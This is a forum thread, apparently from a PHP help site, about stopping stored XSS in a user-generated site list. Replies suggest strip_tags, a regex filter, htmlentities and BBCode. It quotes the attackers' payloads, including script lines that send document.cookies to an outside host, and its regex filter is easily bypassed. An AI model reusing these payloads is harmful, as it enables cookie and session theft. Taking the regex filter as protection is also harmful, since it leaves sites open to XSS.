Blocking <script> in PHP?

[JayJabber]

Well people who hate my site have been coming on and making a site with my site maker . And instead of filling in proper info they put <script> which redirects. And when they finish it saves into mysql and when i view the list of sites it redirects me to another site, Anyone know what can solve this?

[Ollifi]

Can you use strip_tags function ?

 

E: Hmm, it may not block javascript. Have a look at this.

[JayJabber]

Thanks for the cmment but what exactly does it do?

[Ollifi]

It should remove javascript codes from a string. Did you mean that?

[JayJabber]

It should remove javascript codes from a string. Did you mean that?

 

 

It works but how can i remove the message part

<?php

 

function strip_script($string) {

    // Prevent inline scripting

    //$string = preg_replace("/<script[^>]*>.*<*script[^>]*>/i", "", $string);

$string = preg_replace("/<script[^>]*>.*?< *script[^>]*>/i", "", $string);

    // Prevent linking to source files

    $string = preg_replace("/<script[^>]*>/i", "", $string);

 

    //styles

    $string = preg_replace("/<style[^>]*>.*<*style[^>]*>/i", "", $string);

    // Prevent linking to source files

    $string = preg_replace("/<style[^>]*>/i", "", $string);

    return $string;

}

 

$cnt = <<<H

<scr<script>ipt language="javascript">alert('PlayerScape Secruity System v1')</script> <----

H;

 

echo strip_script($cnt);

 

 

?>

[JayJabber]

ok its not working

The codes which are being used are;

 

<script> for(;{alert('*CENSORED*')}</script>

<script>document.location=”http://minecraftuk.org/xss/?c=” + document.cookies</script>

<script>window.location=”http://minecraftuk.org/xss/?c=” + document.cookies</script>

[jcbones]

You could run your input through htmlentities().  Which will show all elements in plain text on the screen.  Thereby they will not execute.

 

In the event that you wish to let users format their own text, you should use BBCode.  This is the main reason it was written.

[mikesta707]

In addition to htmlentities, if you simply wanted to remove certain tags from the users input, you could use the strip_tags() function using the optional allowable tags argument, if you wanted to remove every tags but, for example, anchor tags.

[requinix]

In addition to htmlentities, if you simply wanted to remove certain tags from the users input, you could use the strip_tags() function using the optional allowable tags argument, if you wanted to remove every tags but, for example, anchor tags.

Keep in mind that strip_tags() doesn't look at attributes, so it would allow stuff such as

Click me, I'm totally legit!

[Pikachu2000]

In that case, the entire <a> tag should be stripped, taking the onclick with it. The only thing left would be the text "Click me, I'm totally legit!"

[requinix]

If wasn't in the list of allowed tags, right.

[mikesta707]

Thats true. But in that case, he should just use html entities, as there are quite a few html tags that support the onclick event. He could also do a regex replace to get rid of all onclick events also, if he really wanted to use strip_tags.

 

However as jcbones has said, using bbc code is probably the best option.